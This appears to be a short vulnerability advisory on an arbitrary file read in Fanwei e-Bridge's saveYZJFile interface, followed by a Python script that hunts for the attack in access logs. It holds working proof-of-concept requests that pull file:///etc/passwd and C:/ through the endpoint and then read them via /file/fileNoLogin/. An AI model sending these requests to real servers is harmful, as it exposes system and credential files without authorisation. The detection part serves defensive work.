Panwei OA E-Bridge saveYZJFile arbitrary file reading vulnerability
Vulnerability Description
Affected Versions
Fanwei Cloud Bridge (e-Bridge), multiple versions from 2018-2019
Network surveying and mapping
Vulnerability reproduction
# Windows verification PoC
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
A successful response returns an id value, indicating that the vulnerability is present.
# Linux verification PoC
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
A successful response returns an id value, indicating that the vulnerability is present.
Then call the file-view interface at /file/fileNoLogin/{id value} to access the file.
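For detection, the two-step request pattern above can be hunted for in web access logs: a `saveYZJFile` call whose `downloadUrl` uses the `file:` scheme, followed by a `/file/fileNoLogin/` read from the same client. The Python below is an added example, not part of the original post; it assumes combined-format access logs, and the sample lines, addresses and ids are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1" 200 87
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /file/fileNoLogin/abc123 HTTP/1.1" 200 1432
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /wxjsapi/saveYZJFile?fileName=a&downloadUrl=FILE%3A%2F%2F%2FC%3A%2F&fileExt=txt HTTP/1.1" 200 90
192.0.2.44 - - [01/Jan/2024:10:02:00 +0000] "GET /wxjsapi/saveYZJFile?fileName=r&downloadUrl=https%3A%2F%2Fexample.com%2Fr.pdf&fileExt=pdf HTTP/1.1" 200 88
192.0.2.44 - - [01/Jan/2024:10:02:05 +0000] "GET /file/fileNoLogin/def456 HTTP/1.1" 200 20480
"""

# client, method, request target, status (assumed combined log layout)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def scan(log_text):
    """Return findings for file: downloadUrl requests and follow-up file views."""
    findings, flagged = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        path = url.path.lower()
        if path.endswith("/wxjsapi/saveyzjfile"):
            # parse_qs percent-decodes values, so encoded schemes are caught too
            for value in parse_qs(url.query).get("downloadUrl", []):
                if value.strip().lower().startswith("file:"):
                    flagged.add(client)
                    findings.append((client, "local-file-downloadUrl", value, status))
        elif path.startswith("/file/filenologin/") and client in flagged:
            # Same client reading a stored file after a flagged save request
            findings.append((client, "followup-file-view", url.path, status))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `local-file-downloadUrl` hit with status 200 followed by a `followup-file-view` from the same client is the sequence to prioritise for investigation.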
This post is licensed under CC BY 4.0 by the author.